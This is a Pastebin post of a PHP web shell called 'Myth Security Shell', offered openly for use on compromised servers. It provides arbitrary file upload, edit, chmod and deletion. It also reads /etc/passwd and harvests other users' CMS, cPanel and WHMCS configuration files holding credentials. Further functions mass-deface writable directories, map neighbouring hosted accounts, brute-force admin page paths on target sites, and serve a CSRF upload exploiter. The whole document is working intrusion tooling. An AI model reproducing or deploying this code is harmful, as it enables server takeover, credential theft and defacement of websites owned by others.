API tools faq
paste
Mr-Hichiko

Shell Mini MST

Mr-Hichiko
Jan 17th, 2018
243
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.10 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. if(get_magic_quotes_gpc()){
  5. foreach($_POST as $key=>$value){
  6. $_POST[$key] = stripslashes($value);
  7. }
  8. }
  9. echo '<!DOCTYPE HTML>
  10. <html>
  11. <head>
  12. <link href="" rel="stylesheet" type="text/css">
  13. <title>MST Shell</title>
  14. <style>
  15. body{
  16. background-color: black;
  17. color:red;
  18. }
  19. #content tr:hover{
  20. background-color: red;
  21. text-shadow:0px 0px 10px #fff;
  22. }
  23. #content .first{
  24. background-color: navy;
  25. }
  26. table{
  27. border: 1px #000000 dotted;
  28. }
  29. a{
  30. color:white;
  31. text-decoration: none;
  32. }
  33. a:hover{
  34. color:red;
  35. text-shadow:0px 0px 10px #ffffff;
  36. }
  37. input,select,textarea{
  38. border: 2px #00ff00 dotted;
  39. -moz-border-radius: 5px;
  40. -webkit-border-radius:5px;
  41. border-radius:5px;
  42. }
  43. </style>
  44. </head>
  45. <body>
  46. <h1><tt><center><font color="red">Welcome<br>|
  47. Myth Security Shell|<br></font></center></h1></tt>
  48. <table width="700" border="0" cellpadding="3" cellspacing="1"
  49. align="center">
  50. <tr><td><font color="white">Path :</font> ';
  51. if(isset($_GET['path'])){
  52. $path = $_GET['path'];
  53. }else{
  54. $path = getcwd();
  55. }
  56. $path = str_replace('\\','/',$path);
  57. $paths = explode('/',$path);
  58. foreach($paths as $id=>$pat){
  59. if($pat == '' && $id == 0){
  60. $a = true;
  61. echo '<a href="?path=/">/</a>';
  62. continue;
  63. }
  64. if($pat == '') continue;
  65. echo '<a href="?path=';
  66. for($i=0;$i<=$id;$i++){
  67. echo "$paths[$i]";
  68. if($i != $id) echo "/";
  69. }
  70. echo '">'.$pat.'</a>/';
  71. }
  72. echo '</td></tr><tr><td>';
  73. if(isset($_FILES['file'])){
  74. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']
  75. ['name'])){
  76. echo '<font color="green">Upload Berhasil brohh</font><br />';
  77. }else{
  78. echo '<font color="red">Upload Gagal</font><br/>';
  79. }
  80. }
  81. echo '<form enctype="multipart/form-data" method="POST">
  82. <font color="red">File Upload :</font> <input type="file"
  83. name="file" />
  84. <input type="submit" value="upload" />
  85. </form>
  86. </td></tr>';
  87. echo "<center><a href='?dir=$dir&do=finder'>[] Admin Finder
  88. [] |<a href='?dir=$dir&do=csrf'>[] CSRF Online [] | </a><a
  89. href='?dir=$dir&do=config'>[] Config [] | </a>
  90. <a href='?dir=$dir&do=mass_deface'>[] Mass Deface [] | </
  91. a><br><a href='?dir=$dir&do=jumping'>[] Jumping [] | </a><a
  92. href='/mini.php'>[] Home []</a>";
  93. if($_GET['do'] == 'csrf') {
  94. echo' <html>
  95. <title>CSRF EXPLOITER ONLINE</title>
  96. <center><br><br><br><br>
  97. <font color=red>Csrf By Mr.Hichiko
  98. <center>
  99. <form method="post">
  100. URL: <input type="text" name="url" size="50" height="10"
  101. placeholder="http://www.target.com/[path]/vuln.php"
  102. style="margin: 5px auto; padding-left: 5px;" required><br>
  103. POST File: <input type="text" name="pf" size="50" height="10"
  104. placeholder="Filedata / Fileupload / dzfile / files[] / qqfile /
  105. userfile / dll " style="margin: 5px auto; padding-left: 5px;"
  106. required><br>
  107. <input type="submit" name="d" value="Lock!">
  108. </form>';
  109. }
  110. if($_GET['do'] == 'config') {
  111. $etc = fopen("/etc/passwd", "r") or die("<pre><font
  112. color=red>Can't read /etc/passwd</font></pre>");
  113. $idx = mkdir("007_config", 0777);
  114. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  115. $htc = fopen("007_config/.htaccess","w");
  116. fwrite($htc, $isi_htc);
  117. while($passwd = fgets($etc)) {
  118. if($passwd == "" || !$etc) {
  119. echo "<font color=red>Can't read /etc/passwd</font>";
  120. } else {
  121. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  122. foreach($user_config[1] as $user_idx) {
  123. $user_config_dir = "/home/$user_idx/public_html/";
  124. if(is_readable($user_config_dir)) {
  125. $grab_config = array(
  126. "/home/$user_idx/.my.cnf" => "cpanel",
  127. "/home/$user_idx/.accesshash" => "WHM-
  128. accesshash",
  129. "/home/$user_idx/public_html/po-content/
  130. config.php" => "Popoji",
  131. "/home/$user_idx/public_html/vdo_config.php"
  132. => "Voodoo",
  133. "/home/$user_idx/public_html/bw-configs/
  134. config.ini" => "BosWeb",
  135. "/home/$user_idx/public_html/config/
  136. koneksi.php" => "Lokomedia",
  137. "/home/$user_idx/public_html/lokomedia/
  138. config/koneksi.php" => "Lokomedia",
  139. "/home/$user_idx/public_html/clientarea/
  140. configuration.php" => "WHMCS",
  141. "/home/$user_idx/public_html/whm/
  142. configuration.php" => "WHMCS",
  143. "/home/$user_idx/public_html/whmcs/
  144. configuration.php" => "WHMCS",
  145. "/home/$user_idx/public_html/forum/
  146. config.php" => "phpBB",
  147. "/home/$user_idx/public_html/sites/default/
  148. settings.php" => "Drupal",
  149. "/home/$user_idx/public_html/config/
  150. settings.inc.php" => "PrestaShop",
  151. "/home/$user_idx/public_html/app/etc/
  152. local.xml" => "Magento",
  153. "/home/$user_idx/public_html/joomla/
  154. configuration.php" => "Joomla",
  155. "/home/$user_idx/public_html/
  156. configuration.php" => "Joomla",
  157. "/home/$user_idx/public_html/wp/wp-
  158. config.php" => "WordPress",
  159. "/home/$user_idx/public_html/wordpress/wp-
  160. config.php" => "WordPress",
  161. "/home/$user_idx/public_html/wp-config.php"
  162. => "WordPress",
  163. "/home/$user_idx/public_html/admin/
  164. config.php" => "OpenCart",
  165. "/home/$user_idx/public_html/slconfig.php" =>
  166. "Sitelok",
  167. "/home/$user_idx/public_html/application/
  168. config/database.php" => "Ellislab");
  169. foreach($grab_config as $config => $nama_config) {
  170. $ambil_config = file_get_contents($config);
  171. if($ambil_config == '') {
  172. } else {
  173. $file_config = fopen("007_config/$user_idx-$
  174. nama_config.txt","w");
  175. fputs($file_config,$ambil_config);
  176. }
  177. }
  178. }
  179. }
  180. }
  181. }
  182. echo "<center><a href='?dir=$dir/007_config'><font
  183. color=red>Done</font></a></center>";
  184. }
  185. if($_GET['do'] == 'mass_deface') {
  186. function sabun_massal($dir,$namafile,$isi_script) {
  187. if(is_writable($dir)) {
  188. $dira = scandir($dir);
  189. foreach($dira as $dirb) {
  190. $dirc = "$dir/$dirb";
  191. $lokasi = $dirc.'/'.$namafile;
  192. if($dirb === '.') {
  193. file_put_contents($lokasi, $isi_script);
  194. } elseif($dirb === '..') {
  195. file_put_contents($lokasi, $isi_script);
  196. } else {
  197. if(is_dir($dirc)) {
  198. if(is_writable($dirc)) {
  199. echo "[<font color=red>DONE</font>] $
  200. lokasi<br>";
  201. file_put_contents($lokasi, $isi_script);
  202. $idx = sabun_massal($dirc,$namafile,$isi_script);
  203. }
  204. }
  205. }
  206. }
  207. }
  208. }
  209. function sabun_biasa($dir,$namafile,$isi_script) {
  210. if(is_writable($dir)) {
  211. $dira = scandir($dir);
  212. foreach($dira as $dirb) {
  213. $dirc = "$dir/$dirb";
  214. $lokasi = $dirc.'/'.$namafile;
  215. if($dirb === '.') {
  216. file_put_contents($lokasi, $isi_script);
  217. } elseif($dirb === '..') {
  218. file_put_contents($lokasi, $isi_script);
  219. } else {
  220. if(is_dir($dirc)) {
  221. if(is_writable($dirc)) {
  222. echo "[<font color=red>DONE</font>] $dirb/$
  223. namafile<br>";
  224. file_put_contents($lokasi, $isi_script);
  225. }
  226. }
  227. }
  228. }
  229. }
  230. }
  231. if($_POST['start']) {
  232. if($_POST['tipe_sabun'] == 'mahal') {
  233. echo "<div style='margin: 5px auto; padding: 5px'>";
  234. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  235. echo "</div>";
  236. } elseif($_POST['tipe_sabun'] == 'murah') {
  237. echo "<div style='margin: 5px auto; padding: 5px'>";
  238. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST
  239. ['script']);
  240. echo "</div>";
  241. }
  242. } else {
  243. echo "<center>";
  244. echo "<form method='post'>
  245. <font style='text-decoration: underline;'>Type/
  246. font><br>
  247. <input type='radio' name='tipe_sabun' value='murah'
  248. checked>Biasa<input type='radio' name='type'
  249. value='mahal'>Massal<br>
  250. <font style='text-decoration: underline;'>Folder:</font><br>
  251. <input type='text' name='d_dir' value='$dir' style='width:
  252. 450px;' height='10'><br>
  253. <font style='text-decoration: underline;'>Filename:</
  254. font><br>
  255. <input type='text' name='d_file' value='index.php'
  256. style='width: 450px;' height='10'><br>
  257. <font style='text-decoration: underline;'>Index File:</
  258. font><br>
  259. <textarea name='script' style='width: 450px; height:
  260. 200px;'>PCT Shell Code</textarea><br>
  261. <input type='submit' name='start' value='Mass Deface'
  262. style='width: 450px;'>
  263. </form></center>";
  264. }
  265. }
  266. if($_GET['do'] == 'jumping') {
  267. $i = 0;
  268. echo "<div class='margin: 5px auto;'>";
  269. if(preg_match("/hsphere/", $dir)) {
  270. $urls = explode("\r\n", $_POST['url']);
  271. if(isset($_POST['jump'])) {
  272. echo "<pre>";
  273. foreach($urls as $url) {
  274. $url = str_replace(array("http://","www."), "",
  275. strtolower($url));
  276. $etc = "/etc/passwd";
  277. $f = fopen($etc,"r");
  278. while($gets = fgets($f)) {
  279. $pecah = explode(":", $gets);
  280. $user = $pecah[0];
  281. $dir_user = "/hsphere/local/home/$user";
  282. if(is_dir($dir_user) === true) {
  283. $url_user = $dir_user."/".$url;
  284. if(is_readable($url_user)) {
  285. $i++;
  286. $jrw = "[<font color=red>R</font>] <a href='?
  287. dir=$url_user'><font color=lavender>$url_user</font></a>";
  288. if(is_writable($url_user)) {
  289. $jrw = "[<font color=red>RW</font>] <a
  290. href='?dir=$url_user'><font color=lavender>$url_user</font></
  291. a>";
  292. }
  293. echo $jrw."<br>";
  294. }
  295. }
  296. }
  297. }
  298. if($i == 0) {
  299. } else {
  300. echo "<br>Total ada ".$i." Kamar di ".$ip;
  301. }
  302. echo "</pre>";
  303. } else {
  304. echo '<center>
  305. <form method="post">
  306. List Domains: <br>
  307. <textarea name="url" style="width: 500px; height:
  308. 250px;">';
  309. $fp = fopen("/hsphere/local/config/httpd/sites/
  310. sites.txt","r");
  311. while($getss = fgets($fp)) {
  312. echo $getss;
  313. }
  314. echo '</textarea><br>
  315. <input type="submit" value="Jumping" name="jump"
  316. style="width: 500px; height: 25px;">
  317. </form></center>';
  318. }
  319. } elseif(preg_match("/vhosts/", $dir)) {
  320. $urls = explode("\r\n", $_POST['url']);
  321. if(isset($_POST['jump'])) {
  322. echo "<pre>";
  323. foreach($urls as $url) {
  324. $web_vh = "/var/www/vhosts/$url/httpdocs";
  325. if(is_dir($web_vh) === true) {
  326. if(is_readable($web_vh)) {
  327. $i++;
  328. $jrw = "[<font color=red>R</font>] <a href='?
  329. dir=$web_vh'><font color=gold>$web_vh</font></a>";
  330. if(is_writable($web_vh)) {
  331. $jrw = "[<font color=red>RW</font>] <a
  332. href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  333. }
  334. echo $jrw."<br>";
  335. }
  336. }
  337. }
  338. if($i == 0) {
  339. } else {
  340. echo "<br>Total ada ".$i." Kamar di ".$ip;
  341. }
  342. echo "</pre>";
  343. } else {
  344. echo '<center>
  345. <form method="post">
  346. List Domains: <br>
  347. <textarea name="url" style="width: 500px; height:
  348. 250px;">';
  349. bing("ip:$ip");
  350. echo '</textarea><br>
  351. <input type="submit" value="Jumping" name="jump"
  352. style="width: 500px; height: 25px;">
  353. </form></center>';
  354. }
  355. } else {
  356. echo "<pre>";
  357. $etc = fopen("/etc/passwd", "r") or die("<font
  358. color=red>Can't read /etc/passwd</font>");
  359. while($passwd = fgets($etc)) {
  360. if($passwd == '' || !$etc) {
  361. echo "<font color=red>Can't read /etc/passwd</
  362. font>";
  363. } else {
  364. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  365. foreach($user_jumping[1] as $user_idx_jump) {
  366. $user_jumping_dir = "/home/$user_idx_jump/
  367. public_html";
  368. if(is_readable($user_jumping_dir)) {
  369. $i++;
  370. $jrw = "[<font color=red>R</font>] <a href='?
  371. dir=$user_jumping_dir'><font color=lavender>$user_jumping_
  372. dir</font></a>";
  373. if(is_writable($user_jumping_dir)) {
  374. $jrw = "[<font color=red>RW</font>] <a
  375. href='?dir=$user_jumping_dir'><font color=lavender>$user_
  376. jumping_dir</font></a>";
  377. }
  378. echo $jrw;
  379. if(function_exists('posix_getpwuid')) {
  380. $domain_jump = file_get_contents("/etc/
  381. named.conf");
  382. if($domain_jump == '') {
  383. echo " => ( <font color=red>gabisa ambil
  384. nama domain nya</font> )<br>";
  385. } else {
  386. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  387. foreach($domains_jump[1] as $dj) {
  388. $user_jumping_url = posix_getpwuid(@ fileowner("/etc/valiases/$dj"));
  389. $user_jumping_url = $user_jumping_url
  390. ['name'];
  391. if($user_jumping_url == $user_idx_jump) {
  392. echo " => ( <u>$dj</u> )<br>";
  393. break;
  394. }
  395. }
  396. }
  397. } else {
  398. echo "<br>";
  399. }
  400. }
  401. }
  402. }
  403. }
  404. if($i == 0) {
  405. } else {
  406. echo "<br>Total ada ".$i." Kamar di ".$ip;
  407. }
  408. echo "</pre>";
  409. }
  410. echo "</div>";
  411. }if($_GET['do'] == 'finder') {
  412. echo '<html>
  413. <head>
  414. <title>Admin Finder By Myth Security Team</title>
  415. </head>
  416. <body bgcolor="blue">
  417. <center><font color="red"><tt>
  418. <h1>FIND YOUR ADMIN PAGE!!</h1>
  419. <p
  420. >******************************************************************
  421. ****************************************************</p>
  422. <p>THIS TO.oL W4S C0DED By Myth Security Team</p>
  423. <p>Special Thanks To My Team)</b><b></b></p>
  424. <p>Sebelum menggunakan Tool Ini,, Baca Bissmillah Dulu ya bro Dan
  425. Pastikan Anda Memiliki Wajah Tampan Dan Sadar diri :P :-D
  426. (18/1/2018)</p>
  427. <p
  428. >******************************************************************
  429. ****************************************************</p>
  430. <br>
  431. <br>
  432. <form method ="POST" action ="<?php $PHP_SELF; ?>">
  433. <p>Masukkan Target (Tanpa tanda "/" diakhir url target) :</
  434. p><input type="text" size="70" name="url" value="http://
  435. target.com/"/>
  436. <br>
  437. <input type="submit" name="submit" value="Cari Admin Disini bro:-D"/>
  438. <br>
  439. <br>';
  440. function xss_protect($data, $strip_tags = false, $allowed_tags =""){
  441. if($strip_tags){
  442. $data = strip_tags($dara, $allowed_tags. "<b>");
  443. }
  444. if(stripos($data, "script") !== false){
  445. $result = str_replace
  446. ("script","scr<b></b>ipt",htmlentities($data, ENT_QUOTES));
  447. }else{
  448. $result = htmlentities($data, ENT_QUOTES);
  449. }
  450. return $result;
  451. }
  452. function urlExist($url){
  453. $handle = curl_init($url);
  454. if(false === $handle)
  455. {
  456. return false;
  457. }
  458. curl_setopt($handle, CURLOPT_HEADER, false);
  459. curl_setopt($handle, CURLOPT_FAILONERROR, true);
  460. curl_setopt($handle, CURLOPT_HEADER, array("User-Agent:
  461. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15)
  462. Gecko/20080623 Firefox/2.0.0.15"));
  463. curl_setopt($handle, CURLOPT_NOBODY, true);
  464. curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
  465. $connectable = curl_exec($handle);
  466. curl_close($handle);
  467. return $connectable;
  468. }
  469. if(isset($_POST['url']))
  470. {
  471. $url = htmlentities(xss_protect($_POST['url']));
  472. if(filter_var($url, FILTER_VALIDATE_URL))
  473. {
  474. $trying = array
  475. ("admin","administrator","adm","login","login.php","administrator.
  476. php","admins.php","logins","admincp",
  477. "admincp.php","admin1.php", "admin1.html", "admin2.php",
  478. "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php",
  479. "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php",
  480. "maintenance/", "webmaster/", "adm/", "configuration/",
  481. "configure/", "websvn/", "admin/", "admin/account.php",
  482. "admin/account.html". "admin/index.php", "admin/index.html",
  483. "admin/login.php","admin/login.html", "admin/home.php",
  484. "admin/controlpanel.html", "admin/controlpanel.php",
  485. "admin.php", "admin.html", "admin/cp.php", "admin/cp.html",
  486. "cp.php", "cp.html", "administrator/","administrator/
  487. index.html", "administrator/index.php", "administrator/
  488. login.html", "administrator/login.php", "administrator/
  489. account.html", "administrator/account.php",
  490. "administrator.php","administrator.html", "login.php",
  491. "login.html", "modelsearch/login.php", "moderator.php",
  492. "moderator.html", "moderator/login.php", "moderator/
  493. login.html","moderator/admin.php","moderator/admin.html",
  494. "moderator/", "account.php", "account.html", "controlpanel/",
  495. "controlpanel.php", "controlpanel.html", "admincontrol.php",
  496. "admincontrol.html", "adminpanel.php","adminpanel.html",
  497. "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp",
  498. "admin/account.asp", "admin/index.asp", "admin/login.asp",
  499. "admin/home.asp", "admin/controlpanel.asp", "admin.asp",
  500. "admin/cp.asp", "cp.asp", "administrator/
  501. index.asp","administrator/login.asp","administrator/
  502. account.asp","administrator.asp", "login.asp", "modelsearch/
  503. login.asp", "moderator.asp","moderator/login.asp",
  504. "moderator/admin.asp", "account.asp", "controlpanel.asp",
  505. "admincontrol.asp", "adminpanel.asp", "fileadmin/",
  506. "fileadmin.php", "fileadmin.asp",
  507. "fileadmin.html","administration/", "administration.php",
  508. "administration.html", "sysadmin.php", "sysadmin.html",
  509. "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-
  510. admin.asp", "ur-admin.php","ur-admin.html", "ur-admin/",
  511. "Server.php", "Server.html", "Server.asp", "Server/", "wp-
  512. admin/", "administr8.php", "administr8.html", "administr8/",
  513. "administr8.asp", "webadmin/",
  514. "webadmin.php","webadmin.asp", "webadmin.html",
  515. "administratie/", "admins/", "admins.php", "admins.asp",
  516. "admins.html", "administrivia/", "Database_Administration/",
  517. "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-
  518. administration/", "administrators/", "pgadmin/",
  519. "directadmin/", "staradmin/", "ServerAdministrator/",
  520. "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/",
  521. "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_
  522. login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/",
  523. "support_login/", "meta_login/", "manuallogin/",
  524. "simpleLogin/", "loginflat/","utility_login/", "showlogin/",
  525. "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-
  526. login/", "login1/", "dir-login/", "login_db/", "xlogin/",
  527. "smblogin/", "customer_login/", "UserLogin/","login-us/",
  528. "acct_login/", "admin_area/", "bigadmin/", "project-admins/",
  529. "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/",
  530. "openvpnadmin/", "wizmysqladmin/", "vadmind/",
  531. "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/",
  532. "adminpro/", "Lotus_Domino_Admin/", "bbadmin/",
  533. "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-
  534. macadmin/","banneradmin/","sshadmin/","phpldapadmin/","
  535. macadmin/","administratoraccounts/", "admin4_
  536. account/","admin4_
  537. colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/"
  538. ,"SysAdmin2/","globes_
  539. admin/","cadmins/","phpSQLiteAdmin/",
  540. "navSiteAdmin/","server_admin_small/","logo_
  541. sysadmin/","server/","database_administration/","power_
  542. user/", "system_administration/", "ss_vms_admin_sm/");
  543. foreach($trying as $sec)
  544. {
  545. $urll = $url.'/'.$sec;
  546. if(urlExist($urll))
  547. {
  548. echo '<p><font
  549. color="00ff00"'.$urll.' exists.<br>PAGE FOUND!!!</p></font>';
  550. exit;
  551. }else
  552. {
  553. echo '<p><font
  554. color="red">'.$urll.' does not exist.</font></p>';
  555. }
  556. }
  557. echo '<p><font color="red">Could not find admin
  558. page.</font></p>';
  559. }
  560. else
  561. {
  562. echo '<p><font color="red">Invalid
  563. URL entered.</font></p>';
  564. }
  565. }
  566. echo '</body>
  567. </html>';
  568. }
  569. if(isset($_GET['filesrc'])){
  570. echo "<tr><td>Current File : ";
  571. echo $_GET['filesrc'];
  572. echo '</tr></td></table><br />';
  573. echo('<pre>'.htmlspecialchars(file_get_contents($_GET
  574. ['filesrc'])).'</pre>');
  575. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  576. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  577. if($_POST['opt'] == 'chmod'){
  578. if(isset($_POST['perm'])){
  579. if(chmod($_POST['path'],$_POST['perm'])){
  580. echo '<font color="green">Horee Ubah Permission Berhasil</
  581. font><br/>';
  582. }else{
  583. echo '<font color="red">Ubah Permission Gagal</
  584. font><br />';
  585. }
  586. }
  587. echo '<form method="POST">
  588. Permission : <input name="perm" type="text" size="4"
  589. value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  590. <input type="hidden" name="path" value="'.$_POST['path'].'">
  591. <input type="hidden" name="opt" value="chmod">
  592. <input type="submit" value="Meluncur" />
  593. </form>';
  594. }elseif($_POST['opt'] == 'rename'){
  595. if(isset($_POST['newname'])){
  596. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  597. echo '<font color="green">Ganti Nama Berhasil</
  598. font><br/>';
  599. }else{
  600. echo '<font color="red">Ganti Nama Gagal</
  601. font><br />';
  602. }
  603. $_POST['name'] = $_POST['newname'];
  604. }
  605. echo '<form method="POST">
  606. New Name : <input name="newname" type="text" size="20"
  607. value="'.$_POST['name'].'" />
  608. <input type="hidden" name="path" value="'.$_POST['path'].'">
  609. <input type="hidden" name="opt" value="rename">
  610. <input type="submit" value="Meluncur" />
  611. </form>';
  612. }elseif($_POST['opt'] == 'edit'){
  613. if(isset($_POST['src'])){
  614. $fp = fopen($_POST['path'],'w');
  615. if(fwrite($fp,$_POST['src'])){
  616. echo '<font color="green">Berhasil Edit File</font><br/
  617. >';
  618. }else{
  619. echo '<font color="red">Gagal Edit File</font><br/>';
  620. }
  621. fclose($fp);
  622. }
  623. echo '<form method="POST">
  624. <textarea cols=80 rows=20 name="src">'.htmlspecialchars
  625. (file_get_contents($_POST['path'])).'</textarea><br />
  626. <input type="hidden" name="path" value="'.$_POST['path'].'">
  627. <input type="hidden" name="opt" value="edit">
  628. <input type="submit" value="Simpan" />
  629. </form>';
  630. }
  631. echo '</center>';
  632. }else{
  633. echo '</table><br/><center>';
  634. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  635. if($_POST['type'] == 'dir'){
  636. if(rmdir($_POST['path'])){
  637. echo '<font color="green">Horee Directory Terhapus</
  638. font><br/>';
  639. }else{
  640. echo '<font color="red">Directory Gagal Terhapus
  641. </font><br/>';
  642. }
  643. }elseif($_POST['type'] == 'file'){
  644. if(unlink($_POST['path'])){
  645. echo '<font color="green">Horee File Terhapus</font><br/>';
  646. }else{
  647. echo '<font color="red">File Gagal Dihapus</font><br/
  648. >';
  649. }
  650. }
  651. }
  652. echo '</center>';
  653. $scandir = scandir($path);
  654. echo '<div id="content"><table width="700" border="0"
  655. cellpadding="3" cellspacing="1" align="center">
  656. <tr class="first">
  657. <td><center>Name</peller></center></td>
  658. <td><center>Size</peller></center></td>
  659. <td><center>Permission</peller></center></td>
  660. <td><center>Modify</peller></center></td>
  661. </tr>';
  662. foreach($scandir as $dir){
  663. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  664. echo '<tr>
  665. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  666. <td><center>--</center></td>
  667. <td><center>';
  668. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  669. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  670. echo perms($path.'/'.$dir);
  671. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir))
  672. echo '</font>';
  673. echo '</center></td>
  674. <td><center><form method="POST" action="?option&path='.$path.'">
  675. <select name="opt">
  676. <option value="">Select</option>
  677. <option value="delete">Delete</option>
  678. <option value="chmod">Chmod</option>
  679. <option value="rename">Rename</option>
  680. </select>
  681. <input type="hidden" name="type" value="dir">
  682. <input type="hidden" name="name" value="'.$dir.'">
  683. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  684. <input type="submit" value="Sikat!!">
  685. </form></center></td>
  686. </tr>';
  687. }
  688. echo '<tr class="first"><td></td><td></td><td></td><td></
  689. td></tr>';
  690. foreach($scandir as $file){
  691. if(!is_file($path.'/'.$file)) continue;
  692. $size = filesize($path.'/'.$file)/1024;
  693. $size = round($size,3);
  694. if($size >= 1024){
  695. $size = round($size/1024,2).' MB';
  696. }else{
  697. $size = $size.' KB';
  698. }
  699. echo '<tr>
  700. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</
  701. a></td>
  702. <td><center>'.$size.'</center></td>
  703. <td><center>';
  704. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  705. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  706. echo perms($path.'/'.$file);
  707. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file))
  708. echo '</font>';
  709. echo '</center></td>
  710. <td><center><form method="POST" action="?option&path='.$path.'">
  711. <select name="opt">
  712. <option value="">Select</option>
  713. <option value="delete">Delete</option>
  714. <option value="chmod">Chmod</option>
  715. <option value="rename">Rename</option>
  716. <option value="edit">Edit</option>
  717. </select>
  718. <input type="hidden" name="type" value="file">
  719. <input type="hidden" name="name" value="'.$file.'">
  720. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  721. <input type="submit" value="Sikat!!">
  722. </form></center></td>
  723. </tr>';
  724. }
  725. echo '</table>
  726. </div>';
  727. }
  728. echo '<center><br/>Myth Security ShellShell</center>
  729. </body>
  730. </html>';
  731. function perms($file){
  732. $perms = fileperms($file);
  733. if (($perms & 0xC000) == 0xC000) {
  734. // Socket
  735. $info = 's';
  736. } elseif (($perms & 0xA000) == 0xA000) {
  737. // Symbolic Link
  738. $info = 'l';
  739. } elseif (($perms & 0x8000) == 0x8000) {
  740. // Regular
  741. $info = '-';
  742. } elseif (($perms & 0x6000) == 0x6000) {
  743. // Block special
  744. $info = 'b';
  745. } elseif (($perms & 0x4000) == 0x4000) {
  746. // Directory
  747. $info = 'd';
  748. } elseif (($perms & 0x2000) == 0x2000) {
  749. // Character special
  750. $info = 'c';
  751. } elseif (($perms & 0x1000) == 0x1000) {
  752. // FIFO pipe
  753. $info = 'p';
  754. } else {
  755. // Unknown
  756. $info = 'u';
  757. }
  758. // Owner
  759. $info .= (($perms & 0x0100) ? 'r' : '-');
  760. $info .= (($perms & 0x0080) ? 'w' : '-');
  761. $info .= (($perms & 0x0040) ?
  762. (($perms & 0x0800) ? 's' : 'x' ) :
  763. (($perms & 0x0800) ? 'S' : '-'));
  764. // Group
  765. $info .= (($perms & 0x0020) ? 'r' : '-');
  766. $info .= (($perms & 0x0010) ? 'w' : '-');
  767. $info .= (($perms & 0x0008) ?
  768. (($perms & 0x0400) ? 's' : 'x' ) :
  769. (($perms & 0x0400) ? 'S' : '-'));
  770. // World
  771. $info .= (($perms & 0x0004) ? 'r' : '-');
  772. $info .= (($perms & 0x0002) ? 'w' : '-');
  773. $info .= (($perms & 0x0001) ?
  774. (($perms & 0x0200) ? 't' : 'x' ) :
  775. (($perms & 0x0200) ? 'T' : '-'));
  776. return $info;
  777. }
  778. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!